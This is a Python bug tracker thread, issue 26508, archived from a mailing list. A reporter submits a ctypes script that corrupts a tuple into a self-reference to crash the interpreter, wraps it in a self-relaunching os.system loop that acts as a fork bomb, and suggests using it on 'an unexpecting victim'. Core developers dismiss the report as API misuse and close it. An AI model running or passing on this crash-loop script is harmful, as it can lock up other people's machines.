[issue26508] Infinite crash leading to DoS

2016-03-09 Thread STINNER Victor 

STINNER Victor added the comment:

"Then it is no bug that it crashes python?"

The bug is your program creating inconsistent data. Without ctypes, you cannot 
create such inconsistent data.

"Is a crash not a bug?"

There are various ways to "crash" Python, but most of them are deliberate bugs. 
For example:

haypo@selma$ python3
Python 3.4.3 (default, Jun 29 2015, 12:16:01) 
[GCC 5.1.1 20150618 (Red Hat 5.1.1-4)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ctypes
>>> ctypes.string_at(0)
Erreur de segmentation (core dumped)

The ctypes doesn't prevent you from making mistakes. If you use ctypes, you 
must be very careful and understand what you are doing.

--

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue26508] Infinite crash leading to DoS

2016-03-08 Thread Brett Cannon 

Brett Cannon added the comment:

Victor's point is that this isn't a bug because you are manipulating the C API 
to make this occur. That means there is no safety guarantee and thus this is 
not a bug but simply a mis-use of the C API.

--
nosy: +brett.cannon
resolution: works for me -> not a bug
status: open -> closed

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue26508] Infinite crash leading to DoS

2016-03-08 Thread pablo sacristan 

Changes by pablo sacristan :


--
status: closed -> open

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue26508] Infinite crash leading to DoS

2016-03-08 Thread pablo sacristan 

pablo sacristan added the comment:

New content for crash.py:

import ctypes, struct, sys, os
inner = ()
outer = (inner,)
c_outer = (ctypes.c_char * sys.getsizeof(outer)).from_address(id(outer))
inner_index = c_outer[:].find(struct.pack('P', id(inner)))
c_outer[inner_index:inner_index+struct.calcsize('P')] = struct.pack('P', 
id(outer))
print outer

--

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue26508] Infinite crash leading to DoS

2016-03-08 Thread pablo sacristan 

pablo sacristan added the comment:

Then it is no bug that it crashes python? You don't have to put it in a loop, 
but by looping it I am adding the part that makes it take more time but will 
keep on crashing infinitely, take away the while loop but not what it has 
inside and then also delete the os.system() and you get python to crash once. 
Is a crash not a bug?

--
resolution: not a bug -> works for me

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue26508] Infinite crash leading to DoS

2016-03-08 Thread STINNER Victor 

STINNER Victor added the comment:

> "construct and print a self-referencing tuple"

I don't understand the use case here. In pure Python, you cannot build a 
self-referecing tuple!?

Yeah, using the C API or by modifying bytes directly in the memory, you can do 
that. But if you start to use the C API, you must be careful. The C API is 
designed for speed, not to prevent bugs.

I don't think that we should fix anything in Python. I don't consider that it's 
a bug in Python.


> run it and wait around 10 sec for it to happen, but once it starts you will 
> be forced to force it to shut because it will keep on crashing infinitely 
> which is extremely annoying,

Basically, crash.py is a fork-bomb: the program starts itself in a loop. It's 
not a bug in Python.

--
nosy: +haypo
resolution:  -> not a bug
status: open -> closed

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue26508] Infinite crash leading to DoS

2016-03-07 Thread pablo sacristan 

New submission from pablo sacristan:

import ctypes, struct, sys, os
while 1:
os.system('python /Users/pabstersac/Desktop/Python\ Files/crash.py') 
#Change to your full path to the file
inner = ()
outer = (inner,)
c_outer = (ctypes.c_char * sys.getsizeof(outer)).from_address(id(outer))
inner_index = c_outer[:].find(struct.pack('P', id(inner)))
c_outer[inner_index:inner_index+struct.calcsize('P')] = struct.pack('P', 
id(outer))
print outer
#construct and print a self-referencing tuple
run it and wait around 10 sec for it to happen, but once it starts you will be 
forced to force it to shut because it will keep on crashing infinitely which is 
extremely annoying, and even while it says it crashed it still runs and keeps 
on running infinitely, which if you do on an unexpecting victim, they will 
probably shut down the computer directly.
There are basically two problems here, the way you construct and then print a 
self-referencing tuple, and the way you handle when it is put in an infinite 
loop with itself calling its own file (which if you wait long enough will see 
the effect goes quicker every second, it goes up exponentially) and you don't 
stop it correctly.

--
files: crash.py
messages: 261319
nosy: pabstersac
priority: normal
severity: normal
status: open
title: Infinite crash leading to DoS
type: security
Added file: http://bugs.python.org/file42088/crash.py

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com